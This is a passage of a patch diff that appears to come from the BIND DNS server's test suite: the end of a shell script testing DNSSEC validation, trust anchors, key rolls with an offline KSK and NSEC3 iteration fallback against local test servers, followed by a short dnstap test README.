+dig_with_opts managed-future.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that trust-anchor-telemetry queries are logged ($n)" +ret=0 +grep "sending trust-anchor-telemetry query '_ta-[0-9a-f]*/NULL" ns6/named.run > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that _ta-XXXX trust-anchor-telemetry queries are logged ($n)" +ret=0 +grep "trust-anchor-telemetry '_ta-[0-9a-f]*/IN' from" ns1/named.run > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that _ta-AAAA trust-anchor-telemetry are not sent when disabled ($n)" +ret=0 +grep "sending trust-anchor-telemetry query '_ta-[0-9a-f]*/IN" ns1/named.run > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that KEY-TAG trust-anchor-telemetry queries are logged ($n)" +ret=0 +dig_with_opts . dnskey +ednsopt=KEY-TAG:ffff @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "trust-anchor-telemetry './IN' from .* 65535" ns1/named.run > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that multiple KEY-TAG trust-anchor-telemetry options don't leak memory ($n)" +ret=0 +dig_with_opts . dnskey +ednsopt=KEY-TAG:fffe +ednsopt=KEY-TAG:fffd @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "trust-anchor-telemetry './IN' from .* 65534" ns1/named.run > /dev/null || ret=1 +grep "trust-anchor-telemetry './IN' from .* 65533" ns1/named.run > /dev/null && ret=1 +stop_server ns1 || ret=1 +nextpart ns1/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns1 || ret=1 +n=$(($n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "waiting for root server to finish reloading ($n)" +ret=0 +wait_for_log 20 "all zones loaded" ns1/named.run || ret=1 +n=$(($n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that the view is logged in messages from the validator when using views ($n)" +ret=0 +grep "view rec: *validat" ns4/named.run > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that DNAME at apex with NSEC3 is correctly signed (dnssec-signzone) ($n)" +ret=0 +dig_with_opts txt dname-at-apex-nsec3.example @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "RRSIG.NSEC3 $DEFAULT_ALGORITHM_NUMBER 3 600" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that DNSKEY and other occluded data are excluded from the delegating bitmap ($n)" +ret=0 +dig_with_opts axfr occluded.example @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "^delegation.occluded.example..*NSEC.*NS KEY DS RRSIG NSEC$" dig.out.ns3.test$n > /dev/null || ret=1 +grep "^delegation.occluded.example..*DNSKEY.*" dig.out.ns3.test$n > /dev/null || ret=1 +grep "^delegation.occluded.example..*AAAA.*" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking DNSSEC records are occluded from ANY in an insecure zone ($n)" +ret=0 +dig_with_opts any x.insecure.example. @10.53.0.3 > dig.out.ns3.1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns3.1.test$n > /dev/null || ret=1 +dig_with_opts any zz.secure.example. @10.53.0.3 > dig.out.ns3.2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.2.test$n > /dev/null || ret=1 +# DNSKEY+RRSIG, NSEC+RRSIG +grep "ANSWER: 4," dig.out.ns3.2.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# DNSSEC tests related to unsupported, disabled and revoked trust anchors. +# + +# This nameserver (ns8) is loaded with a bunch of trust anchors. Some of +# them are good (enabled.managed, enabled.trusted, secure.managed, +# secure.trusted), and some of them are bad (disabled.managed, +# revoked.managed, unsupported.managed, disabled.trusted, revoked.trusted, +# unsupported.trusted). Make sure that the bad trust anchors are ignored. +# This is tested by looking for the corresponding lines in the logfile. +echo_i "checking that keys with unsupported algorithms and disabled algorithms are ignored ($n)" +ret=0 +grep -q "ignoring static-key for 'disabled\.trusted\.': algorithm is disabled" ns8/named.run || ret=1 +grep -q "ignoring static-key for 'unsupported\.trusted\.': algorithm is unsupported" ns8/named.run || ret=1 +grep -q "ignoring static-key for 'revoked\.trusted\.': bad key type" ns8/named.run || ret=1 +grep -q "ignoring initial-key for 'disabled\.managed\.': algorithm is disabled" ns8/named.run || ret=1 +grep -q "ignoring initial-key for 'unsupported\.managed\.': algorithm is unsupported" ns8/named.run || ret=1 +grep -q "ignoring initial-key for 'revoked\.managed\.': bad key type" ns8/named.run || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# The next two tests are fairly normal DNSSEC queries to signed zones with a +# default algorithm. First, a query is made against the server that is +# authoritative for the given zone (ns3). Second, a query is made against a +# resolver with trust anchors for the given zone (ns8). Both are expected to +# return an authentic data positive response. +echo_i "checking that a trusted key using a supported algorithm validates as secure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.secure.trusted A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.secure.trusted A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a managed key using a supported algorithm validates as secure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.secure.managed A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.secure.managed A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# The next two queries ensure that a zone signed with a DNSKEY with an unsupported +# algorithm will yield insecure positive responses. These trust anchors in ns8 are +# ignored and so this domain is treated as insecure. The AD bit should not be set +# in the response. +echo_i "checking that a trusted key using an unsupported algorithm validates as insecure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.unsupported.trusted A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.unsupported.trusted A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a managed key using an unsupported algorithm validates as insecure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.unsupported.managed A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.unsupported.managed A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# The next two queries ensure that a zone signed with a DNSKEY that the nameserver +# has a disabled algorithm match for will yield insecure positive responses. +# These trust anchors in ns8 are ignored and so this domain is treated as insecure. +# The AD bit should not be set in the response. +echo_i "checking that a trusted key using a disabled algorithm validates as insecure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.disabled.trusted A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.disabled.trusted A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a managed key using a disabled algorithm validates as insecure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.disabled.managed A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.disabled.managed A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# The next two queries ensure that a zone signed with a DNSKEY that the +# nameserver has a disabled algorithm for, but for a different domain, will +# yield secure positive responses. Since "enabled.trusted." and +# "enabled.managed." do not match the "disable-algorithms" option, no +# special rules apply and these zones should validate as secure, with the AD +# bit set. +echo_i "checking that a trusted key using an algorithm disabled for another domain validates as secure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.enabled.trusted A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.enabled.trusted A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a managed key using an algorithm disabled for another domain validates as secure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.enabled.managed A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.enabled.managed A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# A configured revoked trust anchor is ignored and thus the two queries below +# should result in insecure responses, since no trust points for the +# "revoked.trusted." and "revoked.managed." zones are created. +echo_i "checking that a trusted key that is revoked validates as insecure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.revoked.trusted A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.revoked.trusted A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a managed key that is revoked validates as insecure ($n)" +ret=0 +dig_with_opts @10.53.0.3 a.revoked.managed A > dig.out.ns3.test$n +dig_with_opts @10.53.0.8 a.revoked.managed A > dig.out.ns8.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +### +### Additional checks for when the KSK is offline. +### + +# Save some useful information +zone="updatecheck-kskonly.secure" +KSK=$(cat ns2/${zone}.ksk.key) +ZSK=$(cat ns2/${zone}.zsk.key) +KSK_ID=$(cat ns2/${zone}.ksk.id) +ZSK_ID=$(cat ns2/${zone}.zsk.id) +SECTIONS="+answer +noauthority +noadditional" +echo_i "testing zone $zone KSK=$KSK_ID ZSK=$ZSK_ID" + +# Print IDs of keys used for generating RRSIG records for RRsets of type $1 +# found in dig output file $2. +get_keys_which_signed() { + qtype=$1 + output=$2 + # The key ID is the 11th column of the RRSIG record line. + awk -v qt="$qtype" '$4 == "RRSIG" && $5 == qt {print $11}' < "$output" +} + +# Basic checks to make sure everything is fine before the KSK is made offline. +for qtype in "DNSKEY" "CDNSKEY" "CDS" +do + echo_i "checking $qtype RRset is signed with KSK only (update-check-ksk, dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +echo_i "checking SOA RRset is signed with ZSK only (update-check-ksk and dnssec-ksk-only) ($n)" +ret=0 +dig_with_opts $SECTIONS @10.53.0.2 soa $zone > dig.out.test$n +lines=$(get_keys_which_signed "SOA" dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +get_keys_which_signed "SOA" dig.out.test$n | grep "^$KSK_ID$" > /dev/null && ret=1 +get_keys_which_signed "SOA" dig.out.test$n | grep "^$ZSK_ID$" > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Roll the ZSK. +zsk2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -K ns2 -n zone "$zone") +keyfile_to_key_id "$zsk2" > ns2/$zone.zsk.id2 +ZSK_ID2=$(cat ns2/$zone.zsk.id2) + +echo_i "load new ZSK $ZSK_ID2 for $zone ($n)" +ret=0 +dnssec_loadkeys_on 2 $zone || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Make new ZSK active. +echo_i "make ZSK $ZSK_ID inactive and make new ZSK $ZSK_ID2 active for zone $zone ($n)" +ret=0 +$SETTIME -I now -K ns2 $ZSK > /dev/null +$SETTIME -A now -K ns2 $zsk2 > /dev/null +dnssec_loadkeys_on 2 $zone || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Remove the KSK from disk. +echo_i "remove the KSK $KSK_ID for zone $zone from disk" +mv ns2/$KSK.key ns2/$KSK.key.bak +mv ns2/$KSK.private ns2/$KSK.private.bak + +# Update the zone that requires a resign of the SOA RRset. +echo_i "update the zone with $zone IN TXT nsupdate added me" +( +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update add $zone. 300 in txt "nsupdate added me" +echo send +) | $NSUPDATE + +# Redo the tests now that the zone is updated and the KSK is offline. +for qtype in "DNSKEY" "CDNSKEY" "CDS" +do + echo_i "checking $qtype RRset is signed with KSK only, KSK offline (update-check-ksk, dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null && ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +for qtype in "SOA" "TXT" +do + echo_i "checking $qtype RRset is signed with ZSK only, KSK offline (update-check-ksk and dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +# Put back the KSK. +echo_i "put back the KSK $KSK_ID for zone $zone from disk" +mv ns2/$KSK.key.bak ns2/$KSK.key +mv ns2/$KSK.private.bak ns2/$KSK.private + +# Roll the ZSK again. +zsk3=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -K ns2 -n zone "$zone") +keyfile_to_key_id "$zsk3" > ns2/$zone.zsk.id3 +ZSK_ID3=$(cat ns2/$zone.zsk.id3) + +# Schedule the new ZSK (ZSK3) to become active. +echo_i "delete old ZSK $ZSK_ID schedule ZSK $ZSK_ID2 inactive and new ZSK $ZSK_ID3 active for zone $zone ($n)" +$SETTIME -D now -K ns2 $ZSK > /dev/null +$SETTIME -I +3600 -K ns2 $zsk2 > /dev/null +$SETTIME -A +3600 -K ns2 $zsk3 > /dev/null +dnssec_loadkeys_on 2 $zone || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Remove the KSK from disk. +echo_i "remove the KSK $KSK_ID for zone $zone from disk" +mv ns2/$KSK.key ns2/$KSK.key.bak +mv ns2/$KSK.private ns2/$KSK.private.bak + +# Update the zone that requires a resign of the SOA RRset. +echo_i "update the zone with $zone IN TXT nsupdate added me again" +( +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update add $zone. 300 in txt "nsupdate added me again" +echo send +) | $NSUPDATE + +# Redo the tests now that the ZSK roll has deleted the old key. +for qtype in "DNSKEY" "CDNSKEY" "CDS" +do + echo_i "checking $qtype RRset is signed with KSK only, old ZSK deleted (update-check-ksk, dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID3$" > /dev/null && ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +for qtype in "SOA" "TXT" +do + echo_i "checking $qtype RRset is signed with ZSK only, old ZSK deleted (update-check-ksk and dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID3$" > /dev/null && ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +# Make the new ZSK (ZSK3) active. +echo_i "make new ZSK $ZSK_ID3 active for zone $zone ($n)" +$SETTIME -I +1 -K ns2 $zsk2 > /dev/null +$SETTIME -A +1 -K ns2 $zsk3 > /dev/null +dnssec_loadkeys_on 2 $zone || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Wait for newest ZSK to become active. +echo_i "wait until new ZSK $ZSK_ID3 active and ZSK $ZSK_ID2 inactive" +for i in 1 2 3 4 5 6 7 8 9 10; do + ret=0 + grep "DNSKEY $zone/$DEFAULT_ALGORITHM/$ZSK_ID3 (ZSK) is now active" ns2/named.run > /dev/null || ret=1 + grep "DNSKEY $zone/$DEFAULT_ALGORITHM/$ZSK_ID2 (ZSK) is now inactive" ns2/named.run > /dev/null || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Update the zone that requires a resign of the SOA RRset. +echo_i "update the zone with $zone IN TXT nsupdate added me one more time" +( +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update add $zone. 300 in txt "nsupdate added me one more time" +echo send +) | $NSUPDATE +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Redo the tests one more time. +for qtype in "DNSKEY" "CDNSKEY" "CDS" +do + echo_i "checking $qtype RRset is signed with KSK only, new ZSK active (update-check-ksk, dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID3$" > /dev/null && ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +for qtype in "SOA" "TXT" +do + echo_i "checking $qtype RRset is signed with ZSK only, new ZSK active (update-check-ksk and dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID3$" > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +echo_i "checking secroots output with multiple views ($n)" +ret=0 +rndccmd 10.53.0.4 secroots 2>&1 | sed 's/^/ns4 /' | cat_i +cp ns4/named.secroots named.secroots.test$n +check_secroots_layout named.secroots.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking sig-validity-interval second field hours vs days ($n)" +ret=0 +# zone configured with 'sig-validity-interval 500 499;' +# 499 days in the future w/ a 20 minute runtime to now allowance +min=$(TZ=UTC $PERL -e '@lt=localtime(time() + 499*3600*24 - 20*60); printf "%.4d%0.2d%0.2d%0.2d%0.2d%0.2d\n",$lt[5]+1900,$lt[4]+1,$lt[3],$lt[2],$lt[1],$lt[0];') +dig_with_opts @10.53.0.2 hours-vs-days AXFR > dig.out.ns2.test$n +awk -v min=$min '$4 == "RRSIG" { if ($9 < min) { exit(1); } }' dig.out.ns2.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking validation succeeds during transition to signed ($n)" +ret=0 +dig_with_opts @10.53.0.4 inprogress A > dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.ns4.test$n >/dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking excessive NSEC3 iteration warnings in named.run ($n)" +ret=0 +grep "zone too-many-iterations/IN: excessive NSEC3PARAM iterations [0-9]* > 150" ns2/named.run >/dev/null 2>&1 || ret=1 +grep "zone too-many-iterations/IN: excessive NSEC3PARAM iterations [0-9]* > 150" ns3/named.run >/dev/null 2>&1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check that the validating resolver will fallback to insecure if the answer +# contains NSEC3 records with high iteration count. +echo_i "checking fallback to insecure when NSEC3 iterations is too high (nxdomain) ($n)" +ret=0 +dig_with_opts @10.53.0.2 does-not-exist.too-many-iterations > dig.out.ns2.test$n || ret=1 +dig_with_opts @10.53.0.4 does-not-exist.too-many-iterations > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 6" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking fallback to insecure when NSEC3 iterations is too high (nodata) ($n)" +ret=0 +dig_with_opts @10.53.0.2 a.too-many-iterations txt > dig.out.ns2.test$n || ret=1 +dig_with_opts @10.53.0.4 a.too-many-iterations txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking fallback to insecure when NSEC3 iterations is too high (wildcard) ($n)" +ret=0 +dig_with_opts @10.53.0.2 wild.a.too-many-iterations > dig.out.ns2.test$n || ret=1 +dig_with_opts @10.53.0.4 wild.a.too-many-iterations > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +grep 'wild\.a\.too-many-iterations\..*A.10\.0\.0\.3' dig.out.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 2, AUTHORITY: 4" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking fallback to insecure when NSEC3 iterations is too high (wildcard nodata) ($n)" +ret=0 +dig_with_opts @10.53.0.2 type100 wild.a.too-many-iterations > dig.out.ns2.test$n || ret=1 +dig_with_opts @10.53.0.4 type100 wild.a.too-many-iterations > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 8" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check that a query against a validating resolver succeeds when there is +# a negative cache entry with trust level "pending" for the DS. Prime +# with a +cd DS query to produce the negative cache entry, then send a +# query that uses that entry as part of the validation process. [GL #3279] +echo_i "check that pending negative DS cache entry validates ($n)" +ret=0 +dig_with_opts @10.53.0.4 +cd insecure2.example. ds > dig.out.prime.ns4.test$n || ret=1 +grep "flags: qr rd ra cd;" dig.out.prime.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.prime.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4, " dig.out.prime.ns4.test$n > /dev/null || ret=1 +dig_with_opts @10.53.0.4 a.insecure2.example. a > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 1, AUTHORITY: 1, " dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dnstap/README b/bin/tests/system/dnstap/README new file mode 100644 index 0000000..856fe48 --- /dev/null +++ b/bin/tests/system/dnstap/README @@ -0,0 +1,27 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The "large-answer.fstrm" file was generated by configuring a named instance +compiled with --enable-dnstap and --enable-fixed-rrset with the following +directives: + + minimal-responses yes; + rrset-order { order fixed; }; + dnstap { auth response; }; + dnstap-identity none; + dnstap-output file "large-answer.fstrm"; + +The captured RRset from the "example." zone was created using: + + $GENERATE 1-48 @ IN A 127.0.0.$ + +A server instance set up this way was then queried non-recursively (RD=0) for +"example/A". diff --git a/bin/tests/system/dnstap/bad-fstrm-reopen-interval.conf 